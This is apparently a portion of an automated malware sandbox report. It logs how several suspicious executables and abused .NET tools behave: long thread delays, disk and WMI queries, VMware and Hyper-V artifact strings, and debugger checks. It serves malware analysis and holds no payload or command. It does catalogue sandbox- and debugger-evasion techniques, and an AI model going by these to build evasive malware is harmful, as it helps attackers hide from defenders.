Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\ProgramData\FRaqbC8wSA1XvpFVjCRGryWt.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\ProgramData\FRaqbC8wSA1XvpFVjCRGryWt.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\ProgramData\FRaqbC8wSA1XvpFVjCRGryWt.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\ProgramData\FRaqbC8wSA1XvpFVjCRGryWt.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\ProgramData\FRaqbC8wSA1XvpFVjCRGryWt.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\ProgramData\FRaqbC8wSA1XvpFVjCRGryWt.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\Windows.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\ProgramData\HM3SOlbpH71yEXUIEAOeIiGX.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\ProgramData\ix4A2DreBBsQwY6YHkidcDjo.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\Windows.exe	File Volume queried: C:\ FullSizeInformation

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 15_2_00408520 GetVersionExW,GetModuleHandleA,GetProcAddress,GetSystemInfo,

15_2_00408520

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 30000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 180000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 180000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 30000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000267001\52i.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Thread delayed: delay time: 60000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\Guid\TypeId.exe	Thread delayed: delay time: 922337203685477
Source: C:\ProgramData\FRaqbC8wSA1XvpFVjCRGryWt.exe	Thread delayed: delay time: 37000
Source: C:\ProgramData\FRaqbC8wSA1XvpFVjCRGryWt.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Thread delayed: delay time: 60000
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 60000
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 59640
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 59146
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 58984
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 58866
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 58765
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 58656
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 58546
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 180000
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 1200000
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 59674
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 59547
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 59435
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 59319
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 599355
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 59766
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 59280
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 59975
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 597156
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 59843
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 59712
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 59411
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 59272
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 58896
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 58797
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 58282
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 58078
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 57922
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 57758
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 57617
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 57505
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 57375
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 57265
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 59970
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 59790
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 59668
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 59511
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 59328
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 59202
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 591262
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 59880
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 59727
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 59414
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 59158
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 59532
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 59141
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 59985
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 59761
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 59622
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 59501
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 59355
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 59245
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 59856
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 59750
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 59641
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 59531
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 59419
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 586094
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 585974
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 59814
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 59469
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 59326
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 59954
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 59739
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 59218
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 59765
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 59418
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 583273
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 59867
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 59700
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 59541
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 59437
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 59804
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 59458
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 59609
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 59468
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 580891
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 59848
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 59717
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 59542
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 59412
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 580081
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 59835
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 59689
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 59502
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 59314
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 59892
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 59873
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 59691
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 59530
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 59338
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 59175
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 59015
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 58857
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 58720
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 576985
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 60000
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 59974
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 59807
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 59666
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 59788
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 59585
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 59451
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 59288
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 59147
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 58993
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 58846
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 58715
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 58569
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 58328
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 59626
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 59906
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 59566
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 59406
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 572129
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 59834
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 59698
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 59574
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 59450
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 59324
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 59188
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 59811
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 59684
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 570297
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 59891
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 59735
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 59579
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 59454
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 569485
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 59844
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 59719
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 59586
Source: C:\Users\user\Windows.exe	Thread delayed: delay time: 37000
Source: C:\Users\user\Windows.exe	Thread delayed: delay time: 922337203685477
Source: C:\ProgramData\HM3SOlbpH71yEXUIEAOeIiGX.exe	Thread delayed: delay time: 37000
Source: C:\ProgramData\HM3SOlbpH71yEXUIEAOeIiGX.exe	Thread delayed: delay time: 922337203685477
Source: C:\ProgramData\ix4A2DreBBsQwY6YHkidcDjo.exe	Thread delayed: delay time: 37000
Source: C:\ProgramData\ix4A2DreBBsQwY6YHkidcDjo.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\Microsoft Network Agent\mswabnet.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Windows.exe	Thread delayed: delay time: 37000
Source: C:\Users\user\Windows.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\xzzrvckwuia.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 30000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 180000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 30000
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Thread delayed: delay time: 60000

Source: Amcache.hve.2.dr	Binary or memory string: VMware
Source: Amcache.hve.2.dr	Binary or memory string: VMware Virtual USB Mouse
Source: Cerker.exe, 00000007.00000002.1742802509.00000000012FD000.00000004.00000010.00020000.00000000.sdmp	Binary or memory string: Avmtoolsd.dll
Source: RegAsm.exe, 0000002D.00000002.2153432768.0000000000D5D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: LRPC-269d65d60108622213Hyper-V RAW
Source: Amcache.hve.2.dr	Binary or memory string: vmci.syshbin
Source: Amcache.hve.2.dr	Binary or memory string: VMware, Inc.
Source: Amcache.hve.2.dr	Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.2.dr	Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.2.dr	Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.2.dr	Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: svchost.exe, 00000001.00000002.3278169991.0000025614853000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2080894884.00000000014C2000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2080894884.00000000014F1000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 00000008.00000002.2080368416.00000000016EF000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 00000008.00000002.2080368416.0000000001688000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 00000014.00000002.2065013682.00000000011E7000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 00000014.00000002.2065013682.0000000001148000.00000004.00000020.00020000.00000000.sdmp, aspnet_compiler.exe, 0000001A.00000002.4505036090.0000020D5F409000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000002D.00000002.2153432768.0000000000D5D000.00000004.00000020.00020000.00000000.sdmp, AddInProcess.exe, 0000002E.00000002.4156132656.00000272D94B6000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 0000002F.00000003.2453113628.000000000109C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: Amcache.hve.2.dr	Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Cerker.exe, 00000007.00000002.1742827791.000000000130E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: vmtoolsd.dllOGO
Source: svchost.exe, 00000001.00000002.3276437320.000002560F22B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW@m
Source: kitty.exe, 00000004.00000002.1743728026.0000000000EFA000.00000004.00000010.00020000.00000000.sdmp	Binary or memory string: Avmtoolsd.dll
Source: RegAsm.exe, 0000002D.00000002.2153432768.0000000000D5D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWje$P
Source: Amcache.hve.2.dr	Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Amcache.hve.2.dr	Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.2.dr	Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: mswabnet.exe, 00000013.00000002.2061415960.0000000001642000.00000004.00000020.00020000.00000000.sdmp, mswabnet.exe, 00000032.00000002.4111651076.0000000000B89000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: FRaqbC8wSA1XvpFVjCRGryWt.exe, 00000011.00000002.2225524002.000000001BF1A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllu
Source: Amcache.hve.2.dr	Binary or memory string: vmci.sys
Source: Amcache.hve.2.dr	Binary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
Source: Amcache.hve.2.dr	Binary or memory string: vmci.syshbin`
Source: FRaqbC8wSA1XvpFVjCRGryWt.exe.8.dr	Binary or memory string: vmware
Source: Amcache.hve.2.dr	Binary or memory string: \driver\vmci,\driver\pci
Source: xzzrvckwuia.exe, 00000029.00000002.2145857389.000000000330D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: \qemu-ga.exe
Source: Cerker.exe, 0000002F.00000002.4110577519.0000000001037000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWhB
Source: Amcache.hve.2.dr	Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: RegAsm.exe, 00000002.00000002.2080894884.00000000014F1000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWR
Source: Cerker.exe, 00000007.00000002.1742827791.000000000130E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: vmtoolsd.dllMnP
Source: Amcache.hve.2.dr	Binary or memory string: VMware20,1
Source: Amcache.hve.2.dr	Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.2.dr	Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.2.dr	Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.2.dr	Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.2.dr	Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: RegAsm.exe, 0000002D.00000002.2148146374.0000000000D34000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW0B
Source: Amcache.hve.2.dr	Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.2.dr	Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.2.dr	Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.2.dr	Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.2.dr	Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: Cerker.exe, 0000002F.00000003.2453113628.000000000109C000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 0000002F.00000003.2561564937.000000000109C000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 0000002F.00000003.2493875039.000000000109C000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 0000002F.00000003.2415545496.000000000109C000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 0000002F.00000003.2506694833.000000000109C000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 0000002F.00000003.2533253732.000000000109C000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 0000002F.00000003.2575917575.000000000109C000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 0000002F.00000003.2603469141.000000000109C000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 0000002F.00000003.2547413407.000000000109C000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 0000002F.00000003.2440307951.000000000109C000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 0000002F.00000003.2335148342.000000000109C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW7^
Source: Cerker.exe, 00000007.00000002.1742802509.00000000012FD000.00000004.00000010.00020000.00000000.sdmp	Binary or memory string: Avmtoolsd.dll0
Source: FRaqbC8wSA1XvpFVjCRGryWt.exe, 00000011.00000002.2225524002.000000001BF1A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}ocal AreV
Source: Amcache.hve.2.dr	Binary or memory string: vmci.inf_amd64_68ed49469341f563

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Anti Debugging

Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)

Source: C:\ProgramData\FRaqbC8wSA1XvpFVjCRGryWt.exe

Code function: 17_2_00007FFD9BAC7B51 CheckRemoteDebuggerPresent,

17_2_00007FFD9BAC7B51

Source: C:\ProgramData\FRaqbC8wSA1XvpFVjCRGryWt.exe

Process queried: DebugPort

Source: C:\Users\user\AppData\Local\Temp\1000268001\kitty.exe

Code function: 4_2_001F0594 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

4_2_001F0594

